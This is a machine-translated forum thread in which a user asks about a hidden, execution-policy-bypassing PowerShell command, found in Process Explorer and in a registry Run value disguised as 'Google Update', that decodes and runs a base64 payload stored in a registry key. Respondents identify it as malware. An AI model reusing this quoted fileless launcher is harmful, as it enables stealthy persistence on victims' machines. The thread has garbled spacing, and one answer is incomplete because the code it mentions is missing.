ProcessExplorer 我得到这一行
C:\ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe“-noprofile -windowstyle hidden -executionpolicy bypass iex([Text.Encoding] :: ASCII.GetString([Convert] :: FromBase64String((gp'HKCU) :\ Software \ Classes下\ ZXWNMNLIMAGAL')LOOTDA)));
它看起来很可疑或正常吗?这是否意味着脚本保存在注册表中而不是文件中?那怎么读?
Edit : 现在我确定当我在注册表中阅读时,它可能是一种编码病毒:
Google Update REG_SZ“C:\ Users \ michael \ AppData \ Local \ Google \ Update \ GoogleUpdate.exe”/ c REG_SZ C:\ Windows \ system32 \ WindowsPowerShell \ v1.0 \ powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex([Text.Encoding] :: ASCII.GetString([Convert] :: FromBase64String((gp'HKCU:\ Software \ Classes \ ZXWNMNLIMAGAL') . LOOTDA))) ;
Edit on 29/03/2016 @ 15:55
如果有人想继续这个讨论我在这里要求解码这个病毒:
How can i read the source code of this encoded powershell script from the registry?
2 回答
此代码表示PowerShell将在没有窗口的情况下执行,并绕过ExecutionPolicy限制来自注册表项
HKCU:\Software\Classes\ZXWNMNLIMAGAL
(base64-encoded)的命令 .对我来说看起来像病毒 .
如果在PowerShell控制台中执行此代码,则可以标识该命令:
这将向您显示要执行的内容 .
我也一样 . 我不确定,但它会在PowerShell中运行一个隐藏的脚本 . 该脚本可能是网络钓鱼 . 我想我的电子邮件发送给我的Outlook联系人 .